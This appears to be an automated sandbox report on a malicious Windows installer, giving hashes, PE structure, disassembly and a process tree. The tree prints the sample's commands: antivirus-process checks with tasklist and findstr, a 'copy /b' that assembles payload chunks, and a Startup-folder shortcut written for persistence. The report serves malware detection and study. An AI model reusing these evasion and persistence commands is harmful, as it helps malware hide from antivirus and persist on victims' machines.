                                            Preview:rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F|U............[...U......Ky......3........................l.....p.....t.....x.....|...........................f....................
                                            Process:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):7.996809227860307
                                            Encrypted:true
                                            SSDEEP:1536:i4Q7LygrgdLdGSKSEEpidsqOlb3JyoV05:i4Q7LygrmLdO1iflb8YE
                                            MD5:52749395F676CE3833EE30AA3F731ED2
                                            SHA1:3A4700BF4337F0F9364C09D782D5EF52C37703F0
                                            SHA-256:3DC90AE634740C1E91CF07589CD87C5D5F2C6B1AEB98D1D6834327EB25CB81BD
                                            SHA-512:FC173BCBC2EC60C57F54D1D59E27DB475CB23DD5F275750822A8F9EC502019D3C909ED6298C16A952D5DDF0A721E09901C10A28BC34EB5A15AC83EC7BAD6920D
                                            Malicious:false
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >), ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):93
                                            Entropy (8bit):4.806549306300412
                                            Encrypted:false
                                            SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J52c6N+MD5DYPG7WHq:HRYF5yjowkn232cmzDGP+WHq
                                            MD5:53CCB63B7CB6333E4E6C7815170D537A
                                            SHA1:4EC9D3021CCCA0421CB44F826083790C6B507AAE
                                            SHA-256:9DC4CE64C59E9BA0CD4564E49A2482B80A5DE9244FEE3AAA3D15FBFE2198C1FE
                                            SHA-512:44D8823A99D6DFF1F817282AE9E0CD9AB87DBEF9DF6FC82A859ACA3D6C6BA4AEF9921E2BDB48726289B35C43889F98B6887024548EC982259A00831F66E8F62C
                                            Malicious:true
                                            Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" ..
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.965195424303814
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:C3KzPHU3UG.exe
                                            File size:900'764 bytes
                                            MD5:b1202e7766f87458e7bbee5a2b2103ca
                                            SHA1:a1e2d3d973fc37992a07668ab024f5df81e1545a
                                            SHA256:48a4042854a402824d35f4c95aed1e448d652d79ed0c251635acbc073200dfcf
                                            SHA512:c61b62eef10ab53a2118a750bd62ff5477e929a4d06b571d9be7d270800e2fbcc62308c2ba13fa45afb1d5d5af3d05e12935ddd7ca89aa3b979103f97b28bf17
                                            SSDEEP:24576:EzZ6PHT6c/ZGYPcdKna0uVBIDB/E2c4K4LOGA7:Euzf/ZnhRSCB/E2caHA7
                                            TLSH:87152343A2058C75FEA20F718AB10512DBFF8E9E15274547A779EA416F387C1272CF29
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7...7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h.
                                            Icon Hash:f0c4ccccccccecf4
                                            Entrypoint:0x403415
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x4BC06CDA [Sat Apr 10 12:19:38 2010 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:bf95d1fc1d10de18b32654b123ad5e1f
                                            Signature Valid:false
                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Validity
                                            • Not Before: 14/03/2023 00:00:00, Not After: 06/04/2025 00:59:59
                                            Subject Chain
                                            • CN="Now.gg, INC", O="Now.gg, INC", L=Campbell, S=California, C=US, SERIALNUMBER=4559077, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                            Version:3
                                            Thumbprint MD5:B36E3D9DABB354A9E7F4DF3CC89D1E23
                                            Thumbprint SHA-1:DBC310671AC6A69DB3643A6B93824251D4AA329A
                                            Thumbprint SHA-256:E1DD51B2509B140813272E25325E41E7B50A9EB5DD6D937A9A832579235E45FF
                                            Serial:04F9D50A6C792C9FD39D472E9837B5FF
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            push 00000020h
                                            xor ebp, ebp
                                            pop esi
                                            mov dword ptr [esp+18h], ebp
                                            mov dword ptr [esp+10h], 00408570h
                                            mov dword ptr [esp+14h], ebp
                                            call dword ptr [00408030h]
                                            push 00008001h
                                            call dword ptr [004080B4h]
                                            push ebp
                                            call dword ptr [004082B0h]
                                            push 00000008h
                                            mov dword ptr [0047B398h], eax
                                            call 00007F35B8819CCCh
                                            push ebp
                                            push 000002B4h
                                            mov dword ptr [0047B2B0h], eax
                                            lea eax, dword ptr [esp+38h]
                                            push eax
                                            push ebp
                                            push 0040856Ch
                                            call dword ptr [00408180h]
                                            push 00408554h
                                            push 004732A0h
                                            call 00007F35B8819B9Ah
                                            call dword ptr [004080B0h]
                                            push eax
                                            mov edi, 004CC0A0h
                                            push edi
                                            call 00007F35B8819B88h
                                            push ebp
                                            call dword ptr [00408130h]
                                            cmp word ptr [004CC0A0h], 0022h
                                            mov dword ptr [0047B2B8h], eax
                                            mov eax, edi
                                            jne 00007F35B881756Ah
                                            push 00000022h
                                            pop esi
                                            mov eax, 004CC0A2h
                                            push esi
                                            push eax
                                            call 00007F35B881985Ch
                                            push eax
                                            call dword ptr [00408250h]
                                            mov esi, eax
                                            mov dword ptr [esp+1Ch], esi
                                            jmp 00007F35B88175F1h
                                            push 00000020h
                                            pop ebx
                                            cmp ax, bx
                                            jne 00007F35B8817569h
                                            inc esi
                                            inc esi
                                            cmp word ptr [esi], bx
                                            je 00007F35B881755Bh
                                            Programming Language:
                                            • [ C ] VS2005 build 50727
                                            • [IMP] VS2005 build 50727
                                            • [ C ] VS2008 SP1 build 30729
                                            • [LNK] VS2008 SP1 build 30729
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8afc | 0xb4 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfd000 | 0x65a8 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd9524 | 0x2978 | .ndata
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2c0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x671c | 0x6800 | 8bb8f6dca80ad27cbdbce9816ab6ae7c | False | 0.6644381009615384 | data | 6.50478910452928 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x8000 | 0x19d6 | 0x1a00 | 161b329b4c70ce4fbd9c1143e738896b | False | 0.4480168269230769 | data | 5.026839717718007 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0xa000 | 0x7139c | 0x200 | 140876ba314e7bc36379ee5c6db80876 | False | 0.271484375 | data | 1.7360077526852977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata | 0x7c000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0xfd000 | 0x65a8 | 0x6600 | 3d532b786dc7d2225c702e184559b4e7 | False | 0.5012254901960784 | data | 5.298120201724995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_ICON | 0xfd208 | 0x5638 | Device independent bitmap graphic, 72 x 144 x 32, image size 22032 | English | United States | 0.49302283436027544
                                            RT_ICON | 0x102840 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8014184397163121
                                            RT_DIALOG | 0x102ca8 | 0x100 | data | English | United States | 0.5234375
                                            RT_DIALOG | 0x102da8 | 0x11c | data | English | United States | 0.6056338028169014
                                            RT_DIALOG | 0x102ec8 | 0x60 | data | English | United States | 0.7291666666666666
                                            RT_GROUP_ICON | 0x102f28 | 0x22 | data | English | United States | 0.9705882352941176
                                            RT_VERSION | 0x102f50 | 0x37c | data | English | United States | 0.4327354260089686
                                            RT_MANIFEST | 0x1032d0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                                            DLL | Import
                                            KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, MulDiv, lstrlenA, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                            USER32.dll | ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, FindWindowExW, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, IsWindow
                                            GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                            SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                            ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                            COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                            ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                            VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                            Language of compilation system | Country where language is spoken | Map
                                            English | United States |
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Aug 31, 2024 20:26:59.464737892 CEST | 64220 | 53 | 192.168.2.4 | 1.1.1.1
                                            Aug 31, 2024 20:26:59.473659992 CEST | 53 | 64220 | 1.1.1.1 | 192.168.2.4
                                            Aug 31, 2024 20:27:11.771641970 CEST | 64277 | 53 | 192.168.2.4 | 1.1.1.1
                                            Aug 31, 2024 20:27:11.812242985 CEST | 53 | 64277 | 1.1.1.1 | 192.168.2.4
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Aug 31, 2024 20:26:59.464737892 CEST | 192.168.2.4 | 1.1.1.1 | 0x5cf8 | Standard query (0) | XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF | A (IP address) | IN (0x0001) | false
                                            Aug 31, 2024 20:27:11.771641970 CEST | 192.168.2.4 | 1.1.1.1 | 0x20be | Standard query (0) | XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Aug 31, 2024 20:26:59.473659992 CEST | 1.1.1.1 | 192.168.2.4 | 0x5cf8 | Name error (3) | XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF | none | none | A (IP address) | IN (0x0001) | false
                                            Aug 31, 2024 20:27:11.812242985 CEST | 1.1.1.1 | 192.168.2.4 | 0x20be | Name error (3) | XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF | none | none | A (IP address) | IN (0x0001) | false


                                            Target ID:0
                                            Start time:14:26:54
                                            Start date:31/08/2024
                                            Path:C:\Users\user\Desktop\C3KzPHU3UG.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\C3KzPHU3UG.exe"
                                            Imagebase:0x400000
                                            File size:900'764 bytes
                                            MD5 hash:B1202E7766F87458E7BBEE5A2B2103CA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:14:26:54
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:14:26:54
                                            Start date:31/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:14:26:55
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0xdb0000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:4
                                            Start time:14:26:55
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "wrsa.exe opssvc.exe"
                                            Imagebase:0x2b0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:5
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0xdb0000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                            Imagebase:0x2b0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:7
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c md 585723
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /V "TranscriptHousesConstitutesMedicaid" Hate
                                            Imagebase:0x2b0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:9
                                            Start time:14:26:57
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\585723\Designing.pif
                                            Wow64 process (32bit):true
                                            Commandline:Designing.pif F
                                            Imagebase:0xb30000
                                            File size:893'608 bytes
                                            MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 4%, Virustotal
                                            Reputation:high
                                            Has exited:false

                                            Target ID:11
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\choice.exe
                                            Wow64 process (32bit):true
                                            Commandline:choice /d y /t 5
                                            Imagebase:0x320000
                                            File size:28'160 bytes
                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:12
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:14:26:58
                                            Start date:31/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:14
                                            Start time:14:27:08
                                            Start date:31/08/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js"
                                            Imagebase:0x7ff726600000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:15
                                            Start time:14:27:08
                                            Start date:31/08/2024
                                            Path:C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p"
                                            Imagebase:0x690000
                                            File size:893'608 bytes
                                            MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            • Detection: 4%, Virustotal
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:12.8%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:21.4%
                                              Total number of Nodes:1325
                                              Total number of Limit Nodes:22
SetForegroundWindow 4014 402c58 4013->4014 4015 401be3 4016 401446 18 API calls 4015->4016 4017 401bea 4016->4017 4018 401446 18 API calls 4017->4018 4019 401aae 4018->4019 4020 401b68 4021 40145c 18 API calls 4020->4021 4022 401b70 4021->4022 4023 40145c 18 API calls 4022->4023 4024 401b7a 4023->4024 4025 401b82 lstrcmpiW 4024->4025 4026 401b98 lstrcmpW 4024->4026 4027 401aae 4025->4027 4026->4027 4028 401f6c 4029 401446 18 API calls 4028->4029 4030 401f73 4029->4030 4031 401446 18 API calls 4030->4031 4032 401f7d 4031->4032 4033 401f90 EnableWindow 4032->4033 4034 401f85 ShowWindow 4032->4034 4035 402c58 4033->4035 4034->4035 4036 4023ee 4037 4023f9 4036->4037 4040 402400 4036->4040 4038 40145c 18 API calls 4037->4038 4038->4040 4039 402411 4041 402421 4039->4041 4043 40145c 18 API calls 4039->4043 4040->4039 4042 40145c 18 API calls 4040->4042 4044 40145c 18 API calls 4041->4044 4042->4039 4043->4041 4045 40242b WritePrivateProfileStringW 4044->4045 4046 40166f 4047 401678 4046->4047 4049 40168c 4046->4049 4048 401446 18 API calls 4047->4048 4048->4049 4050 40276f 4051 401446 18 API calls 4050->4051 4053 402779 4051->4053 4052 4027b0 ReadFile 4052->4053 4059 402811 4052->4059 4053->4052 4054 402813 4053->4054 4055 4027da MultiByteToWideChar 4053->4055 4056 402823 4053->4056 4053->4059 4060 4059ff wsprintfW 4054->4060 4055->4053 4055->4056 4058 40283f SetFilePointer 4056->4058 4056->4059 4058->4059 4060->4059 4061 4026ef GlobalAlloc 4062 402717 4061->4062 4063 402708 4061->4063 4065 40145c 18 API calls 4062->4065 4064 401446 18 API calls 4063->4064 4068 402710 4064->4068 4066 40271f WideCharToMultiByte lstrlenA 4065->4066 4066->4068 4067 402760 4068->4067 4069 402755 WriteFile 4068->4069 4069->4067 4070 401ef0 GetDC GetDeviceCaps 4071 401446 18 API calls 4070->4071 4072 401f0d MulDiv 4071->4072 4073 401446 18 API calls 4072->4073 4074 401f23 4073->4074 4075 4060ca 18 API calls 4074->4075 4076 401f5c CreateFontIndirectW 4075->4076 4077 402c51 4076->4077 4080 
4059ff wsprintfW 4077->4080 4079 402c58 4080->4079 4081 4029f1 4082 40145c 18 API calls 4081->4082 4083 4029f9 FindFirstFileW 4082->4083 4084 402a0c 4083->4084 4086 402a1d 4084->4086 4089 4059ff wsprintfW 4084->4089 4090 405ab8 lstrcpynW 4086->4090 4088 402a2a 4089->4086 4090->4088 4091 403b74 4092 403bd1 4091->4092 4093 403b81 lstrcpynA lstrlenA 4091->4093 4093->4092 4094 403bb2 4093->4094 4094->4092 4095 403bbe GlobalFree 4094->4095 4095->4092 4096 401d76 4097 401446 18 API calls 4096->4097 4098 401d7e 4097->4098 4099 401446 18 API calls 4098->4099 4100 401d89 4099->4100 4101 401d9a 4100->4101 4102 40145c 18 API calls 4100->4102 4103 401dab 4101->4103 4104 40145c 18 API calls 4101->4104 4102->4101 4105 401db4 4103->4105 4106 401dff 4103->4106 4104->4103 4108 401446 18 API calls 4105->4108 4107 40145c 18 API calls 4106->4107 4109 401e07 4107->4109 4110 401dbc 4108->4110 4111 40145c 18 API calls 4109->4111 4112 401446 18 API calls 4110->4112 4113 401e11 FindWindowExW 4111->4113 4114 401dc6 4112->4114 4118 401e31 4113->4118 4115 401dd0 SendMessageTimeoutW 4114->4115 4116 401def SendMessageW 4114->4116 4115->4118 4116->4118 4117 402c58 4118->4117 4120 4059ff wsprintfW 4118->4120 4120->4117 4121 401e76 4122 401446 18 API calls 4121->4122 4123 401e87 SetWindowLongW 4122->4123 4124 402c58 4123->4124 4125 4024f8 4126 4024fc 4125->4126 4127 40145c 18 API calls 4126->4127 4128 40251d 4127->4128 4129 40145c 18 API calls 4128->4129 4130 402528 RegCreateKeyExW 4129->4130 4131 402554 4130->4131 4132 402c58 4130->4132 4133 402570 4131->4133 4134 40145c 18 API calls 4131->4134 4135 40257d 4133->4135 4137 401446 18 API calls 4133->4137 4136 402566 lstrlenW 4134->4136 4138 402599 RegSetValueExW 4135->4138 4139 402ee7 33 API calls 4135->4139 4136->4133 4137->4135 4140 4025b0 RegCloseKey 4138->4140 4139->4138 4140->4132 4142 402979 4143 40296c 4142->4143 4143->4142 4144 401446 18 API calls 4143->4144 4145 40298e 4144->4145 4146 402995 SetFilePointer 4145->4146 4147 4029a6 4146->4147 
